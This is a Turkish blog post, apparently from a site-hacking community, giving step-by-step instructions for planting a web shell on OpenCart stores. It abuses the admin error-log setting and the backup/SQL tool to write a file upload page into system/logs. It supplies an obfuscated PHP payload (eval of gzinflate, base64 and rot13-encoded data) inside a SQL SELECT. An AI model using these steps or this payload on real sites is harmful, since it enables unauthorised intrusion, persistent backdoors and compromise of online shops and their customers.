Opencart Shell Upload

  • on Ağustos 26, 2020

Merhaba arkadaşlar, opencart sitelere shell yüklemeyi daha önce sizlere göstermiştik. Konuyu buradan görebilirsiniz: OPENCART SHELL YÜKLEME

Önceki konumuzda eklenti olarak nasıl yükleyebileceğinizi gösterdik ama bu shell yükleme daha doğrusu bir upload kısmı oluşturma yöntemi eklenti olarak yükleme yönteminden çok çok önce ve uzun yıllardır kullanılan bir yöntem.

Bu yöntemde shell yüklemek için görsellerdeki adımları takip etmeniz yeterli olacaktır.

url kısmından setting/setting yazın ve sunucu kısmına gelin. Site çince olduğu çeviri yaptım sizler için ama genelde hep en sağ sekmeye geçiş yapmamız lazım.
sunucu kısmına geldikten sonra en aşağı iniyoruz ve hata yönetimi kısmında hataları evet/yes yapıp dosya adını da istediğiniz şekilde yazıp .php diye kaydedin.
bunu da yaptıktan sonra sıra url kısmına tool/backup’a geleceğiz veya menüden aynı şekilde gelebilirsiniz. Size vereceğim kodu opencart.sql ne isterseniz işte .sql olacak şekilde kaydedin ve 2 diye işaretlediğim yere tıklayın.
Bu işlem bazı sitelerde olacağı gibi bazılarında olmaz. Olduğunda da site.com/system/logs/phpshells.php veya site.com/system/storage/logs/phpshells.php olur ve bize bir upload kısmı getirecektir.
Bundan sonra da shellinizi yükleyip istediğinizi yapabilirsiniz.

Kodlarımız bunlar:

SELECT '<?php eval (gzinflate(base64_decode(str_rot13("ML/EF8ZjRZnsUrk/hVMOJaQZS19pZ3kkVNtX06qEFgnxAct0bH2RGin/zljgT/c2q9
/iih+BI40TaSguWq98TXxc4k0pOiufqT+K7WvibboK8kxCfTyZ6IddrWcAV5mKhyANXlg0FkNPkJ2wTHUTrlQtoJHUjjyFGycunTqKtI8lnvzPLRJ
DT6ZEPUoIKJWkYyewYRFaJxt+epn6S0qs39+umDuTfsEJnSmd3HRWTkCv/WgX54K4g98833KBSUHXv/Ygqsr+k4USOENPRjxM/ZkaAk56eYDM0xJ5
sK552h1khNHKr2lIXpZOhYvSs2VHZh8O8oKbPibYUutxFLYKpCY2KCo8Y7ByDy6D0l8=")))); ?>' FROM `mouwaffek_table`

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir